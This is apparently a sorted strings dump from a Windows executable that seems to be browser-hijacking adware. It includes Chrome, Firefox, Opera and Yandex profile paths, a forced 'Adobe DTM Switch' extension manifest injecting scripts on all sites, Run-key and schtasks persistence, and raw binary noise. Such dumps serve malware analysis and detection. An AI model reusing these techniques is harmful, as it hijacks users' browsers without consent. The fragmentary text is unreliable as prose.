	"installDate" : 1410007868458, 
.install-event-fired
install.rdfm
install.rdfPK
		"install_time" : "13039128483127350", 
	"internalName" : null, 
InternetCloseHandle
InternetOpenUrlW
InternetOpenW
interrupted
invalid argument
invalid_argument
invalid seek
invalid string position
io error
ios_base::badbit set
ios_base::eofbit set
ios_base::failbit set
iostream
iostream stream error
is a directory
IsDebuggerPresent
' is not a number.
IsProcessorFeaturePresent
IsValidCodePage
IsValidLocale
IsValidLocaleName
<itx<o
jA[jZZ+
JanFebMarAprMayJunJulAugSepOctNovDec
January
jAZjZ^
JH;JDu
j$h$VC
j@j _W
jmdc>907"%,+
j	PjYV
					"js":["contentscript.js"], 
>#?;?k?
"Ka@8+
KERNEL32.dll
				"key" : "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwlRO6q2q4W0gy9FnaF5NsS/+tMk07aUdKmVVO6x3h7mr7kC5m07USXku8UfzDMGjD43JPnWSBg09xdTKkEMiub/CcL+zYWGwSzkfT9hqHGxr4LoqOhdjB+rTV6YYI8bP5Z3dQKhZ0BlpS+yUM9n0K3UAB3U610kCZfbh2fIOhHhVoJ8A3UDZFlltAuKctzpj6k2Lab8mKNn+QZIYauZuWPgB4MBWz5dFtzXZiTqFTNCcDUOhvg7MhKQrXhqPJV8I9fFSHFVuU/B5HTt5FAg+MVLrQbGur52MKo8ZTAHx3tYRR01eAZJpLcFylh9ZPZmzm1N7/xvmMOqhTmF4kILc7QIDAQAB",
(KF;?c%lWM
known_disabled
<)<.<<<l<
LargestInt out of UInt64 range
LargestUInt out of Int64 range
		"lastpingday": "13061462383093293",
LCMapStringEx
LCMapStringW
LeaveCriticalSection
?L?\?h?
>,><>L>\>l>
LoadLibraryExW
LoadResource
	"locales" : [], 
LocalFree
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
		"location" : 1, 
	"location" : "app-profile", 
LockResource
LookupAccountNameW
!^L!^P
;L;Q;_;
m6q	l+e
\mainscript.js
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
		"manifest" : { 
\manifest.json
				"manifest_version" : 2, 
\",\"manifest_version\": 2,\"name\": \"Adobe DTM Switch\",\"update_url\": \"UPDATE_URL\",\"version\": \"1.0\"}{
map/set<T> too long
						"matches" : ["http://*/*", "https://*/*"], 
			"maxVersion" : "4.0.*"
MessageBoxA
MessageBoxW
message size
message_size
\Microsoft\Windows\
			"minVersion" : "3.0", 
Missing ':' after object member name
Missing ',' or ']' in array declaration
Missing ',' or '}' in object declaration
Missing '}' or object member name
MM/dd/yy
modules/addons4.js
modules/addons4.jsPK
modules/GM_notification.jsmRMo
modules/GM_notification.jsPK
modules/PK
Monday
\Mozilla\Firefox\Profiles\
\Mozilla\Firefox\Profiles\*
					"mtime":1416929263766
MultiByteToWideChar
.MZpyeT
			"name":"app-profile",
		"name":"PLUGIN_TITLE", 
				"name" : "PLUGIN_TITLE", 
network down
network_down
network reset
network_reset
network unreachable
network_unreachable
 new[]
_nextafter
N(+FDj
NH;NDt
nlgdemkdapolikbjimjajpmonpbpmipk
no buffer space
no_buffer_space
no child process
no link
no lock available
no message
no message available
NoModify
no protocol option
no_protocol_option
NoRepair
no space on device
no stream resources
no such device
no such device or address
no such file or directory
no such process
not a directory
not a socket
not_a_socket
not a stream
not connected
not_connected
not enough memory
not supported
November
=n>s>|>
(null)
October
O(+GDj
o~JfZfjQ16nq1L
`omni callsig'
OpenProcess
\Opera\Opera
\Opera\Opera\operaprefs.ini
\Opera Software\Opera Next
\Opera Software\Opera Stable
operation canceled
operation in progress
operation_in_progress
operation not permitted
operation not supported
operation_not_supported
operation would block
operation_would_block
operator
	"optionsType" : null, 
	"optionsURL" : "chrome://greasemonkey/content/options.xul",
OutputDebugStringW
owner dead
P1p1|1
P3X3\3`3d3h3l3p3t3x3|3
__pascal
			"path" : "PLUG_ID\\1.0_0", 
PathRemoveFileSpecA
<(<<<P<d<t<
PeekMessageW
permission denied
permission_denied
\\.\PhysicalDrive%d
~pjCXf
`placement delete closure'
`placement delete[] closure'
PLUG_ID
PLUGIN_TITLE
PostMessageW
PP9E u
PPPPPPPP
\Preferences
PrefMetricsService
\prefs.js
presence
Process32FirstW
Process32NextW
protection
protocol error
protocol not supported
protocol_not_supported
PSSj%S
PSSSSV
__ptr64
P?T?X?\?`?d?h?l?p?t?x?|?
PVh<TC
?.?P?W?
PWWWWV
Q$+D1$
qD9qHt
QQSVWd
QQSVWj
QueryPerformanceCounter
|^QX`ek
RaiseException
`.rdata
>.>@>R>d>v>
ReadConsoleW
ReadFile
read only file system
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
RegOpenKeyExA
RegSetValueExA
	"releaseNotesURI" : null, 
@.reloc
remove
RemoveDirectoryA
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
      <requestedPrivileges>
resource deadlock would occur
resource unavailable try again
__restrict
restrict(
result out of range
Rs(xn}V*
RtlUnwind
						"run_at" : "document_end" 
RVSQSWV
s29>w.+>S
s>9>w:+>
safebrowsing
Saturday
`scalar deleting destructor'
\schtasks.exe
			"scriptable_host" : ["http://*/*", "https://*/*"] 
				"scriptable_host" : ["http://*/*", "https://*/*"] 
\Secure Preferences
    </security>
    <security>
September
SetCurrentDirectoryA
SetDefaultDllDirectories
SetEndOfFile
SetFileAttributesA
SetFileInformationByHandleW
SetFilePointerEx
SetLastError
SetPriorityClass
SetStdHandle
SetThreadpoolTimer
SetThreadpoolWait
SetThreadStackGuarantee
settings
SetUnhandledExceptionFilter
SHAppBarMessage
SHELL32.dll
ShellExecuteA
SHGetFolderPathA
SHLWAPI.dll
	"size" : 348588, 
SizeofResource
	"softDisabled" : false, 
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
	"sourceURI" : "http://google.com",
\staged\
			"state" : 1, 
state not recoverable
__stdcall
stream timeout
	"strictCompatibility" : false, 
`string'
string too long
Sunday
SunMonTueWedThuFriSat
super_mac
SVjA[jZ^+
,SVWj0X
SVWjA_jZ+
SVWQQf
\Sync Data Backup
	"syncGUID" : "1Fv-8OiVzpu9",
Syntax error: value, object or array expected.
system
-;?![t
t2Ht"Ht
T2X2l2p2
~';_t|%3
t4;9u%
< t8<	t4
t9Ht*Ht
	"targetApplications" : 
	"targetPlatforms" : []
tC97u?j
_tcPVj@
t$ ;D$
TerminateProcess
text file busy
t	@;FHr
tfHtWHtHHt/
+t"HHt
tHHt*Ht#
__thiscall
!This program cannot be run in DOS mode.
t{HtDHtnHt
t]HtKHt7Ht&Ht
Thursday
timed out
timed_out
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
too many files open
too_many_files_open
too many files open in system
too many links
too many symbolic link levels
  </trustInfo>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
tTHHtLHuz
Tuesday
;t$,v-
t WW9}
]tYj	Y+
 Type Descriptor'
	"type" : "extension", 
Type is not convertible to string
`typeof'
tyPVj@W
u1hPQC
uBjAYjZ+
`udt returning'
uHjAXf;
u#j,Xf;
Unable to parse token length
__unaligned
UnhandledExceptionFilter
UNICODE
Uninstall
UninstallString
<unknown>
unknown error
Unknown exception
unknown key
	"updateDate" : 1410007868458, 
	"updateKey" : null, 
UPDATE_URL
	"updateURL" : null, 
				"update_url" : "UPDATE_URL", 
UQPXY]Y[
URPQQhp
USER32.dll
\User Data\Default
	"userDisabled" : false, 
User JavaScript
User JavaScript File
User JavaScript on HTTPS
user_pref
user_pref("
User Prefs
// ==/UserScript==
// ==UserScript==
<UserScriptConfig><Script filename="content.user.js" name="mainscript" namespace="namespace" description="descr" enabled="true"><Include>http://*</Include><Include>https://*</Include></Script></UserScriptConfig>
UTF-16LE
Value is not convertible to bool.
Value is not convertible to double.
Value is not convertible to Int64.
Value is not convertible to UInt64.
value too large
`vbase destructor'
?(?V?b?n?
`vbtable'
`vcall'
__vectorcall
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
vector<T> too long
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
	"version" : "1.0", 
				"version" : "1.0" 
`vftable'
`virtual displacement map'
	"visible" : true, 
v	N+D$
VVhtGC
=#=W=7>E>O>Z>
WaitForThreadpoolTimerCallbacks
		"was_installed_by_default" : false 
Wednesday
WHPh8=C
WideCharToMultiByte
WININET.dll
Wj0XPV
WPY^KLEBohafst}z
WriteConsoleW
WriteFile
WritePrivateProfileStringA
wrong protocol type
wrong_protocol_type
?`?x?}?
: :$:<:@:X:h:l:|:
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
xppwpp
xpxxxx
\Yandex\YandexBrowser\User Data\Default
yh4AM3
YPhPQC
YPh`YC
<y= >q>R?c?
=$=*=Y=t=
Yu2Vj@h
:[<Z=r=x=